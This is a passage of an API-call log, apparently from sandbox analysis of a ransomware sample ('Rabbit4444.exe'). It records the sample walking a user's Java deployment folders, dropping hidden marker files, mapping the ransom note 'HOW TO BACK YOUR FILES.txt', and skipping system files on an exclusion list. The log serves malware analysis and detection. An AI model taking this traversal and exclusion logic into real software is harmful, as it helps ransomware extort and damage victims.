[0054.189] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp" [0054.189] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10eb68 | out: hHeap=0xe0000) returned 1 [0054.189] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0054.189] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp" [0054.189] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\" [0054.189] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.BFC0E91B00AE8A0620D3" [0054.190] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\tmp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.190] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.193] FlushFileBuffers (hFile=0x27c) returned 1 [0054.194] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.194] CloseHandle (hObject=0x27c) returned 1 [0054.194] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned 56 [0054.194] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.194] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9a029a0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0054.195] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.195] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.195] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.195] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.195] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9a029a0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.195] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.195] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.195] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.195] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.195] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.195] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a029a0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a029a0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a029a0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.195] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.195] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.195] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="Rabbit4444.exe") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2=".") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="..") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="windows") returned -1 [0054.195] lstrcmpiW (lpString1="si", lpString2="bootmgr") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="pagefile.sys") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="boot") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="ids.txt") returned 1 [0054.195] lstrcmpiW (lpString1="si", lpString2="NTUSER.DAT") returned 1 [0054.195] lstrcpyW (in: lpString1=0x130ebaa, lpString2="si" | out: lpString1="si") returned="si" [0054.195] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.195] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x78) returned 0x10dee8 [0054.195] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf63b0 [0054.195] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 0 [0054.195] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0054.195] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\tmp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.199] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.199] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.199] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.199] CloseHandle (hObject=0x278) returned 1 [0054.199] CloseHandle (hObject=0x27c) returned 1 [0054.199] GetCurrentThreadId () returned 0xd98 [0054.199] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.199] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si" [0054.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10dee8 | out: hHeap=0xe0000) returned 1 [0054.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.199] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si" [0054.199] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\" [0054.199] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\.BFC0E91B00AE8A0620D3" [0054.199] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\tmp\\si\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.201] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.203] FlushFileBuffers (hFile=0x27c) returned 1 [0054.204] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.204] CloseHandle (hObject=0x27c) returned 1 [0054.205] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si") returned 59 [0054.205] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.205] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x7adf09ae, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9a029a0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0054.205] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.205] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.205] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.205] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.205] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x7adf09ae, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9a029a0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.205] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.205] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.205] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.205] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.206] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.206] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a029a0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a029a0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a28be5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.206] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.206] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.206] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a029a0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a029a0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a28be5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.206] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0054.206] lstrcpyW (in: lpString1=0x130ebb0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.206] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\tmp\\si\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.207] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.207] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.207] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.207] CloseHandle (hObject=0x278) returned 1 [0054.207] CloseHandle (hObject=0x27c) returned 1 [0054.207] GetCurrentThreadId () returned 0xd98 [0054.207] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0054.207] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security" [0054.207] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0054.207] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0054.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security" [0054.207] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\" [0054.207] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\.BFC0E91B00AE8A0620D3" [0054.207] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\security\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.210] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.213] FlushFileBuffers (hFile=0x27c) returned 1 [0054.215] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.215] CloseHandle (hObject=0x27c) returned 1 [0054.215] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security") returned 61 [0054.215] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.215] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07d8c0f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07d8c0f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe9a28be5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0054.215] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.215] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.215] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.215] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.215] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07d8c0f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07d8c0f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe9a28be5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.216] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.216] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.216] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.216] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a28be5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a28be5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a28be5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.216] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.216] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.216] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a28be5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a28be5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a28be5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.216] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0054.216] lstrcpyW (in: lpString1=0x130ebb4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\security\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.216] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.216] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.217] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.217] CloseHandle (hObject=0x278) returned 1 [0054.217] CloseHandle (hObject=0x27c) returned 1 [0054.217] GetCurrentThreadId () returned 0xd98 [0054.217] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0054.217] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log" [0054.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10e768 | out: hHeap=0xe0000) returned 1 [0054.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0054.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log" [0054.217] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\" [0054.217] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\.BFC0E91B00AE8A0620D3" [0054.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\log\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.219] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.222] FlushFileBuffers (hFile=0x27c) returned 1 [0054.222] 